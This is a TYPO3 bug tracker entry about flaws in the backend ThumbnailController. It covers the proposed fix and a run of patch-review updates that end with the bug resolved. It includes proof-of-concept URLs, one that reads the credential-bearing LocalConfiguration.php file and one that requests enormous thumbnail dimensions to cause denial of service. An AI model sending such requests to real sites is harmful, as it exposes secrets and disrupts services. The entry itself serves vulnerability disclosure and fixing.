Bug #85875
closed
Issues in ThumbnailController
100%
Description
- information disclosure (fileIdentifier can be arbitrary, supports fallback zero-storage)
- denial of service (dimensions, basically whole configuration can be arbitrary)
Introduced in https://review.typo3.org/#/c/56765/ - not released yet to 9.4.0 nor 8.7.19
Solution: Add HMAC to all HTTP request parameters.
PoC¶
XSRF Token has to be adjusted in the links below
Information Disclosure¶
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731 &fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64 &processingInstructions%5Bheight%5D=64c &processingInstructions%5Bcrop%5D=
Denial of Service¶
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731 &fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png &processingInstructions%5Bwidth%5D=1000000 &processingInstructions%5Bheight%5D=1000000c &processingInstructions%5Bcrop%5D=
Updated by Gerrit Code Review over 6 years ago
- Status changed from New to Under Review
Patch set 1 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/57943
Updated by Gerrit Code Review over 6 years ago
Patch set 2 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/57943
Updated by Oliver Hader over 6 years ago
- Project changed from 1716 to TYPO3 Core
- Category deleted (
T3-03: Information Disclosure)
Updated by Oliver Hader over 6 years ago
- Priority changed from Should have to Must have
Updated by Oliver Hader over 6 years ago
- Category set to Backend API
- Target version set to 8.7.19
- PHP Version set to 7.2
Updated by Gerrit Code Review over 6 years ago
Patch set 3 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/57943
Updated by Gerrit Code Review over 6 years ago
Patch set 4 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/57943
Updated by Gerrit Code Review over 6 years ago
Patch set 5 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/57943
Updated by Gerrit Code Review over 6 years ago
Patch set 6 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/57943
Updated by Gerrit Code Review over 6 years ago
Patch set 1 for branch TYPO3_8-7 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/57953
Updated by Oliver Hader over 6 years ago
- Status changed from Under Review to Resolved
- % Done changed from 0 to 100
Applied in changeset 5dbcb5da27bc43bb2a19c770e4d226f47c7bcf0c.
Updated by